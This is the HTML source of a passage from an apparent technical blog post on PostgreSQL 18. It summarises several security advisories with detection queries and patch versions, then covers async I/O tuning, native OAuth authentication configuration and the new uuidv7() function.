&lt;td&gt;8.8&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;td&gt;Server superuser code paths&lt;/td&gt;
&lt;td&gt;Server superuser overwrites client process stack memory&lt;/td&gt;
&lt;td&gt;Server superuser + client RTT&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CVE-2026-6637&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;8.8&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;refint&lt;/code&gt; extension&lt;/td&gt;
&lt;td&gt;Stack buffer overflow → arbitrary code execution + SQL injection&lt;/td&gt;
&lt;td&gt;Low-privilege DB user + &lt;code&gt;refint&lt;/code&gt; trigger&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CVE-2026-6478&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;5.9&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;td&gt;MD5 password comparison&lt;/td&gt;
&lt;td&gt;Covert timing channel — credentials recoverable&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;md5&lt;/code&gt; authentication in use (scram-sha-256 safe)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CVE-2026-6479&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;7.5&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;td&gt;SSL / GSS negotiation&lt;/td&gt;
&lt;td&gt;Uncontrolled recursion → sustained DoS&lt;/td&gt;
&lt;td&gt;Anyone who can connect to a PostgreSQL socket (no auth required)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CVE-2026-6476&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;8.8&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;td&gt;&lt;code&gt;ALTER SUBSCRIPTION ... REFRESH PUBLICATION&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Schema/relation names unquoted in SQL → arbitrary SQL on publisher&lt;/td&gt;
&lt;td&gt;Subscriber owner&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  2.1 CVE-2026-6637 — refint Stack Buffer Overflow (Low-Privilege RCE)
&lt;/h3&gt;

&lt;p&gt;The most dangerous of the 11 is &lt;strong&gt;CVE-2026-6637&lt;/strong&gt;. &lt;code&gt;refint&lt;/code&gt; is a legacy foreign-key integrity trigger module in PostgreSQL's &lt;code&gt;contrib/spi&lt;/code&gt;, written in the &lt;em&gt;late 1990s before native foreign keys existed&lt;/em&gt;. It's still packaged with the distribution and some legacy schemas still use its triggers. Before 18.4, when these triggers fire they pass column names and SQL identifiers through an internal buffer that overflows the stack — leaving a &lt;strong&gt;"low-privilege DB user can execute arbitrary code and perform SQL injection"&lt;/strong&gt; state. It's the &lt;em&gt;only&lt;/em&gt; one of the 11 CVEs that turns into RCE under a regular user's privileges, so clusters with any &lt;code&gt;refint&lt;/code&gt; footprint must patch &lt;em&gt;first&lt;/em&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="c1"&gt;-- Check whether refint is in use anywhere in the cluster&lt;/span&gt;
&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;nspname&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt; &lt;span class="k"&gt;schema_name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
       &lt;span class="n"&gt;p&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;proname&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt; &lt;span class="n"&gt;function_name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
       &lt;span class="k"&gt;c&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;relname&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt; &lt;span class="k"&gt;table_name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
       &lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;tgname&lt;/span&gt;  &lt;span class="k"&gt;AS&lt;/span&gt; &lt;span class="k"&gt;trigger_name&lt;/span&gt;
&lt;span class="k"&gt;FROM&lt;/span&gt;   &lt;span class="n"&gt;pg_trigger&lt;/span&gt; &lt;span class="n"&gt;t&lt;/span&gt;
&lt;span class="k"&gt;JOIN&lt;/span&gt;   &lt;span class="n"&gt;pg_proc&lt;/span&gt;    &lt;span class="n"&gt;p&lt;/span&gt; &lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="n"&gt;p&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;oid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;tgfoid&lt;/span&gt;
&lt;span class="k"&gt;JOIN&lt;/span&gt;   &lt;span class="n"&gt;pg_namespace&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt; &lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;oid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;p&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;pronamespace&lt;/span&gt;
&lt;span class="k"&gt;JOIN&lt;/span&gt;   &lt;span class="n"&gt;pg_class&lt;/span&gt;   &lt;span class="k"&gt;c&lt;/span&gt; &lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="k"&gt;c&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;oid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;tgrelid&lt;/span&gt;
&lt;span class="k"&gt;WHERE&lt;/span&gt;  &lt;span class="n"&gt;p&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;proname&lt;/span&gt; &lt;span class="k"&gt;IN&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'check_primary_key'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'check_foreign_key'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
   &lt;span class="k"&gt;AND&lt;/span&gt; &lt;span class="k"&gt;NOT&lt;/span&gt; &lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;tgisinternal&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="c1"&gt;-- Any row of output means: patch to 18.4 immediately,&lt;/span&gt;
&lt;span class="c1"&gt;-- then migrate to standard foreign keys.&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  2.2 CVE-2026-6478 — MD5 Password Timing Channel
&lt;/h3&gt;

&lt;p&gt;Second in importance: &lt;strong&gt;CVE-2026-6478&lt;/strong&gt;. The server-side comparison between the client's MD5 response and the stored hash used &lt;em&gt;byte-by-byte short-circuit comparison&lt;/em&gt;, leaving a covert timing channel that lets attackers estimate how many leading bytes match. PostgreSQL has used &lt;code&gt;scram-sha-256&lt;/code&gt; by default since 2017, but late migrators, clusters keeping &lt;code&gt;md5&lt;/code&gt; for legacy compatibility, and clusters that explicitly set &lt;code&gt;password_encryption=md5&lt;/code&gt; are all in scope.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="c1"&gt;-- Find users still using MD5 authentication&lt;/span&gt;
&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;rolname&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
       &lt;span class="k"&gt;CASE&lt;/span&gt;
         &lt;span class="k"&gt;WHEN&lt;/span&gt; &lt;span class="n"&gt;rolpassword&lt;/span&gt; &lt;span class="k"&gt;LIKE&lt;/span&gt; &lt;span class="s1"&gt;'md5%'&lt;/span&gt; &lt;span class="k"&gt;THEN&lt;/span&gt; &lt;span class="s1"&gt;'md5 (vulnerable)'&lt;/span&gt;
         &lt;span class="k"&gt;WHEN&lt;/span&gt; &lt;span class="n"&gt;rolpassword&lt;/span&gt; &lt;span class="k"&gt;LIKE&lt;/span&gt; &lt;span class="s1"&gt;'SCRAM-SHA-256%'&lt;/span&gt; &lt;span class="k"&gt;THEN&lt;/span&gt; &lt;span class="s1"&gt;'scram-sha-256 (safe)'&lt;/span&gt;
         &lt;span class="k"&gt;ELSE&lt;/span&gt; &lt;span class="s1"&gt;'plain/unknown'&lt;/span&gt;
       &lt;span class="k"&gt;END&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt; &lt;span class="n"&gt;auth_type&lt;/span&gt;
&lt;span class="k"&gt;FROM&lt;/span&gt;   &lt;span class="n"&gt;pg_authid&lt;/span&gt;
&lt;span class="k"&gt;WHERE&lt;/span&gt;  &lt;span class="n"&gt;rolcanlogin&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;true&lt;/span&gt;
&lt;span class="k"&gt;ORDER&lt;/span&gt;  &lt;span class="k"&gt;BY&lt;/span&gt; &lt;span class="n"&gt;auth_type&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="c1"&gt;-- Also check postgresql.conf and pg_hba.conf:&lt;/span&gt;
&lt;span class="c1"&gt;-- postgresql.conf: password_encryption = scram-sha-256&lt;/span&gt;
&lt;span class="c1"&gt;-- pg_hba.conf:     host all all 0.0.0.0/0 scram-sha-256&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  2.3 CVE-2026-6479 — SSL/GSS Unbounded Recursion DoS
&lt;/h3&gt;

&lt;p&gt;Third is the &lt;strong&gt;no-auth-required DoS&lt;/strong&gt; in &lt;code&gt;CVE-2026-6479&lt;/code&gt;. An attacker who can reach the PostgreSQL socket can send a specific sequence of messages during the SSL/GSS handshake; the handler then loops into unbounded recursion, exhausts stack space, kills backend processes, and in the worse case exhausts the backend slot pool — preventing legitimate users from connecting. &lt;strong&gt;RDS instances exposed to the internet on port 5432 with only VPC peering / IP allowlist&lt;/strong&gt; as guardrails, or misconfigured NodePort services, are the highest-risk targets. Short-term mitigation: restrict &lt;code&gt;hostssl&lt;/code&gt; and &lt;code&gt;hostgssenc&lt;/code&gt; lines in &lt;code&gt;pg_hba.conf&lt;/code&gt; to trusted CIDRs; permanent fix: &lt;strong&gt;patch to 18.4 / 17.10 / 16.14 / 15.18 / 14.23&lt;/strong&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.4 CVE-2026-6476 — ALTER SUBSCRIPTION REFRESH PUBLICATION SQL Injection
&lt;/h3&gt;

&lt;p&gt;Fourth is an SQL injection in &lt;strong&gt;logical replication&lt;/strong&gt;. When &lt;code&gt;ALTER SUBSCRIPTION ... REFRESH PUBLICATION&lt;/code&gt; runs, the subscriber re-fetches the publisher's table list and interpolates schema/relation names into SQL commands &lt;em&gt;without quoting&lt;/em&gt;. A subscriber owner who can control the publisher-side object names could execute arbitrary SQL on the publisher. 18.4 applies &lt;code&gt;quote_ident()&lt;/code&gt; consistently when constructing those commands. Multi-tenant SaaS environments that &lt;em&gt;separate publications per customer&lt;/em&gt; need to patch immediately.&lt;/p&gt;

&lt;h2&gt;
  
  
  3. PostgreSQL 18's Async I/O — Measured Differences Between io_method Options
&lt;/h2&gt;

&lt;p&gt;The biggest architectural change in PostgreSQL 18 is the &lt;strong&gt;async I/O (AIO) subsystem&lt;/strong&gt;. Through 17, backend processes read disk pages synchronously — a page cache miss stalled the entire backend. 18 introduces the &lt;code&gt;io_method&lt;/code&gt; parameter so operators can choose between three dispatch strategies.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;code&gt;io_method&lt;/code&gt;&lt;/th&gt;
&lt;th&gt;Behavior&lt;/th&gt;
&lt;th&gt;Prerequisite&lt;/th&gt;
&lt;th&gt;Typical Effect (Read-Heavy)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;sync&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Synchronous reads, same as pre-18&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;Baseline&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;worker&lt;/code&gt; (default)&lt;/td&gt;
&lt;td&gt;Offload I/O to a dedicated worker process pool&lt;/td&gt;
&lt;td&gt;None (all OS)&lt;/td&gt;
&lt;td&gt;+20–30% on local SSD, +50–150% on network storage&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;io_uring&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Direct use of Linux 5.1+ &lt;code&gt;io_uring&lt;/code&gt; kernel interface&lt;/td&gt;
&lt;td&gt;Linux 5.1+, build with &lt;code&gt;--with-liburing&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Lower CPU overhead vs worker, +0–50% throughput depending on workload&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  3.1 Step 1: io_method=worker — Safe in Almost Every Environment
&lt;/h3&gt;

&lt;p&gt;The safest first step is &lt;code&gt;io_method=worker&lt;/code&gt;. It runs on every OS, doesn't care about kernel version, and doesn't require special build flags. A dedicated worker pool issues page prefetches and the backend polls for results. The effect is largest on &lt;strong&gt;network storage (AWS EBS, GCP Persistent Disk, Azure Managed Disk)&lt;/strong&gt;. classmethod's RDS PostgreSQL 18 benchmark showed &lt;code&gt;worker&lt;/code&gt; mode delivering roughly 2–3x the sequential-scan read throughput of &lt;code&gt;sync&lt;/code&gt;. On local NVMe SSDs, where responses are already microsecond-class, the gain is closer to +20%.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight ini"&gt;&lt;code&gt;&lt;span class="c"&gt;# postgresql.conf — recommended baseline for io_method=worker
&lt;/span&gt;&lt;span class="py"&gt;io_method&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;worker            # default. enabled automatically in 18&lt;/span&gt;
&lt;span class="py"&gt;io_workers&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;3                # worker process count, default 3&lt;/span&gt;
                              &lt;span class="c"&gt;# ⚠️ note: changing requires PostgreSQL restart
&lt;/span&gt;&lt;span class="py"&gt;effective_io_concurrency&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;16 # bump prefetch depth alongside AIO&lt;/span&gt;
&lt;span class="py"&gt;maintenance_io_concurrency&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;32&lt;/span&gt;

&lt;span class="c"&gt;# Monitoring: dispatched I/O count from pg_stat_io view
# SELECT * FROM pg_stat_io WHERE backend_type = 'io worker';
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  3.2 Step 2: io_method=io_uring — CPU Efficiency on Linux 5.1+
&lt;/h3&gt;

&lt;p&gt;Once your workload stabilizes, the next step is &lt;code&gt;io_uring&lt;/code&gt;. Binaries built with &lt;code&gt;./configure --with-liburing&lt;/code&gt; (or official RHEL/Ubuntu packages) on Linux 5.1+ can enable it. io_uring places a shared ring buffer between PostgreSQL and the kernel, cutting syscall overhead. &lt;strong&gt;Because no worker pool is needed, CPU usage drops vs worker mode&lt;/strong&gt;, and high-concurrency OLTP workloads can squeeze additional throughput out. But container runtimes that block &lt;code&gt;io_uring&lt;/code&gt; syscalls via seccomp (Docker's default seccomp profile, some GKE Autopilot nodes) will fail immediately.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# 1) Check kernel version&lt;/span&gt;
&lt;span class="nb"&gt;uname&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt;   &lt;span class="c"&gt;# must be 5.1+, 6.x recommended&lt;/span&gt;

&lt;span class="c"&gt;# 2) Verify liburing build option&lt;/span&gt;
psql &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;"SHOW server_version;"&lt;/span&gt;
psql &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;"SELECT name, setting FROM pg_settings WHERE name = 'io_method';"&lt;/span&gt;
&lt;span class="c"&gt;#  → 'io_uring' should appear as an allowed enum value&lt;/span&gt;

&lt;span class="c"&gt;# 3) Update postgresql.conf&lt;/span&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s1"&gt;'io_method = io_uring'&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; /etc/postgresql/18/main/postgresql.conf
systemctl restart postgresql@18-main

&lt;span class="c"&gt;# 4) Verify io_uring dispatch from pg_stat_io&lt;/span&gt;
psql &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;"SELECT * FROM pg_stat_io WHERE backend_type = 'client backend';"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  3.3 Scope and Limits of AIO
&lt;/h3&gt;

&lt;p&gt;A key constraint: PostgreSQL 18 AIO is &lt;strong&gt;read-only&lt;/strong&gt;. WAL writes and checkpoint dirty-page flushes still take the synchronous path. The result is (a) &lt;em&gt;read-heavy analytic workloads&lt;/em&gt; see the largest gains from sequential and index scans, while (b) &lt;em&gt;write-heavy OLTP barely moves&lt;/em&gt;. &lt;code&gt;shared_buffers&lt;/code&gt; and &lt;code&gt;effective_cache_size&lt;/code&gt; also need to be tuned for the workload — if pages get evicted immediately after prefetch, AIO can't help.&lt;/p&gt;

&lt;h2&gt;
  
  
  4. OAuth 2.0 Native Authentication — Direct IdP Integration in pg_hba.conf
&lt;/h2&gt;

&lt;p&gt;The second major change in 18 is that &lt;strong&gt;OAuth 2.0 authentication is a first-class method in &lt;code&gt;pg_hba.conf&lt;/code&gt;&lt;/strong&gt;. Previously the choices were LDAP, RADIUS, SSPI, PAM — for OAuth you needed an external auth proxy like &lt;code&gt;pgbouncer-rr-patch&lt;/code&gt; or &lt;code&gt;aws_iam&lt;/code&gt;. 18 adds &lt;code&gt;oauth&lt;/code&gt; as a method so PostgreSQL itself validates tokens against IdPs (Okta, Microsoft Entra ID, Keycloak, Auth0, Google).&lt;/p&gt;

&lt;h3&gt;
  
  
  4.1 pg_hba.conf Baseline Patterns
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight ini"&gt;&lt;code&gt;&lt;span class="c"&gt;# /etc/postgresql/18/main/pg_hba.conf
# TYPE   DATABASE   USER   ADDRESS        METHOD   OPTIONS
&lt;/span&gt;
&lt;span class="c"&gt;# OAuth — Keycloak realm 'manoit'
&lt;/span&gt;&lt;span class="err"&gt;hostssl&lt;/span&gt;  &lt;span class="err"&gt;myapp&lt;/span&gt;      &lt;span class="err"&gt;all&lt;/span&gt;    &lt;span class="err"&gt;10.0.0.0/8&lt;/span&gt;     &lt;span class="err"&gt;oauth&lt;/span&gt;    &lt;span class="py"&gt;issuer&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;"https://idp.manoit.co.kr/realms/manoit"&lt;/span&gt; &lt;span class="s"&gt;scope="openid profile email" map=oauth_map&lt;/span&gt;

&lt;span class="c"&gt;# OAuth — Microsoft Entra ID (tenant ID required, custom scope)
&lt;/span&gt;&lt;span class="err"&gt;hostssl&lt;/span&gt;  &lt;span class="err"&gt;analytics&lt;/span&gt;  &lt;span class="err"&gt;all&lt;/span&gt;    &lt;span class="err"&gt;10.0.0.0/8&lt;/span&gt;     &lt;span class="err"&gt;oauth&lt;/span&gt;    &lt;span class="py"&gt;issuer&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;"https://login.microsoftonline.com/{tenant-id}/v2.0"&lt;/span&gt; &lt;span class="s"&gt;scope="api://{client-id}/.default" map=oauth_map&lt;/span&gt;

&lt;span class="c"&gt;# OAuth — Okta org
&lt;/span&gt;&lt;span class="err"&gt;hostssl&lt;/span&gt;  &lt;span class="err"&gt;reporting&lt;/span&gt;  &lt;span class="err"&gt;all&lt;/span&gt;    &lt;span class="err"&gt;10.0.0.0/8&lt;/span&gt;     &lt;span class="err"&gt;oauth&lt;/span&gt;    &lt;span class="py"&gt;issuer&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;"https://manoit.okta.com/oauth2/default"&lt;/span&gt; &lt;span class="s"&gt;scope="openid offline_access" map=oauth_map&lt;/span&gt;

&lt;span class="c"&gt;# Keep scram-sha-256 as backward-compat (emergency access)
&lt;/span&gt;&lt;span class="err"&gt;hostssl&lt;/span&gt;  &lt;span class="err"&gt;all&lt;/span&gt;        &lt;span class="err"&gt;admin&lt;/span&gt;  &lt;span class="err"&gt;10.0.0.0/8&lt;/span&gt;     &lt;span class="err"&gt;scram-sha-256&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Key parameters:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;issuer=&lt;/code&gt; — IdP issuer URL. OAuth is &lt;strong&gt;strict about issuer matching&lt;/strong&gt; down to case and trailing slashes.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;scope=&lt;/code&gt; — Requested scope. Entra ID's default scope does not work; you need a custom one like &lt;code&gt;api://{client-id}/.default&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;map=&lt;/code&gt; — A mapping name in &lt;code&gt;pg_ident.conf&lt;/code&gt; that converts external identity (&lt;code&gt;alice@manoit.co.kr&lt;/code&gt;) into a PostgreSQL role (&lt;code&gt;alice&lt;/code&gt;).&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  4.2 pg_ident.conf Mapping Patterns
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight ini"&gt;&lt;code&gt;&lt;span class="c"&gt;# /etc/postgresql/18/main/pg_ident.conf
# MAPNAME       SYSTEM-USERNAME              PG-USERNAME
&lt;/span&gt;
&lt;span class="err"&gt;oauth_map&lt;/span&gt;       &lt;span class="err"&gt;/^(.+)@manoit\.co\.kr$&lt;/span&gt;       &lt;span class="err"&gt;\1&lt;/span&gt;
&lt;span class="err"&gt;oauth_map&lt;/span&gt;       &lt;span class="err"&gt;alice@partner.com&lt;/span&gt;            &lt;span class="err"&gt;partner_alice&lt;/span&gt;
&lt;span class="err"&gt;oauth_map&lt;/span&gt;       &lt;span class="err"&gt;admin@manoit\.co\.kr&lt;/span&gt;         &lt;span class="err"&gt;postgres&lt;/span&gt;   &lt;span class="c"&gt;# superuser mapping
&lt;/span&gt;&lt;span class="err"&gt;oauth_map&lt;/span&gt;       &lt;span class="err"&gt;/^svc-(.+)@manoit\.co\.kr$&lt;/span&gt;   &lt;span class="err"&gt;svc_\1&lt;/span&gt;     &lt;span class="c"&gt;# service account pattern
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  4.3 Validator Module Is Required
&lt;/h3&gt;

&lt;p&gt;Important: &lt;strong&gt;PostgreSQL 18 core ships without an OAuth validator&lt;/strong&gt;. Core provides the protocol handler and token validation framework; actual signature verification and claim mapping happen in a separate module. Percona's &lt;code&gt;pg_oidc_validator&lt;/code&gt; is the most widely used open-source option, while commercial distributions (EnterpriseDB, Crunchy Data) bundle their own.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight ini"&gt;&lt;code&gt;&lt;span class="c"&gt;# postgresql.conf — load the validator library
&lt;/span&gt;&lt;span class="py"&gt;oauth_validator_libraries&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;'pg_oidc_validator'&lt;/span&gt;

&lt;span class="c"&gt;# pg_oidc_validator.conf (module-specific settings)
&lt;/span&gt;&lt;span class="nn"&gt;[manoit]&lt;/span&gt;
&lt;span class="py"&gt;issuer&lt;/span&gt;       &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"https://idp.manoit.co.kr/realms/manoit"&lt;/span&gt;
&lt;span class="py"&gt;jwks_uri&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"https://idp.manoit.co.kr/realms/manoit/protocol/openid-connect/certs"&lt;/span&gt;
&lt;span class="py"&gt;audience&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"postgresql"&lt;/span&gt;
&lt;span class="py"&gt;require_iss&lt;/span&gt;  &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;true&lt;/span&gt;
&lt;span class="py"&gt;require_aud&lt;/span&gt;  &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;true&lt;/span&gt;
&lt;span class="py"&gt;clock_skew_seconds&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;60&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  4.4 Client Connection
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# libpq 19+ (or PostgreSQL 18 client)&lt;/span&gt;
psql &lt;span class="s2"&gt;"postgres://alice@db.manoit.co.kr:5432/myapp?&lt;/span&gt;&lt;span class="se"&gt;\&lt;/span&gt;&lt;span class="s2"&gt;
  oauth_issuer=https://idp.manoit.co.kr/realms/manoit&amp;amp;&lt;/span&gt;&lt;span class="se"&gt;\&lt;/span&gt;&lt;span class="s2"&gt;
  oauth_client_id=postgres-client&amp;amp;&lt;/span&gt;&lt;span class="se"&gt;\&lt;/span&gt;&lt;span class="s2"&gt;
  sslmode=require"&lt;/span&gt;
&lt;span class="c"&gt;# A device-code or PKCE authorization-code flow opens in the browser.&lt;/span&gt;
&lt;span class="c"&gt;# Once issued, the token is forwarded to the PostgreSQL backend for validation.&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  5. UUIDv7 — Timestamp-Ordered UUIDs as a First-Class Citizen
&lt;/h2&gt;

&lt;p&gt;UUIDs have become the standard for index-friendly IDs, but classical &lt;strong&gt;UUIDv4 is fully random&lt;/strong&gt; — every new key dirties a different page in the B-Tree, inflating WAL and cache misses. 18 adds &lt;strong&gt;&lt;code&gt;uuidv7()&lt;/code&gt;&lt;/strong&gt; as a standard function. UUIDv7 packs Unix epoch milliseconds into the first 48 bits and random into the rest, producing UUIDs that are &lt;em&gt;sorted by time&lt;/em&gt;.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Strategy&lt;/th&gt;
&lt;th&gt;Distribution&lt;/th&gt;
&lt;th&gt;Hot Index Pages&lt;/th&gt;
&lt;th&gt;WAL Burden&lt;/th&gt;
&lt;th&gt;Read Cache Hit Rate&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;uuidv4()&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Fully random&lt;/td&gt;
&lt;td&gt;Spread across all pages&lt;/td&gt;
&lt;td&gt;High (all pages dirtied)&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;uuidv7()&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Time-ordered&lt;/td&gt;
&lt;td&gt;Concentrated on latest pages&lt;/td&gt;
&lt;td&gt;Low (localized writes)&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;bigserial&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Increasing integer&lt;/td&gt;
&lt;td&gt;Concentrated on latest pages&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;



&lt;div class="highlight js-code-highlight"&gt;
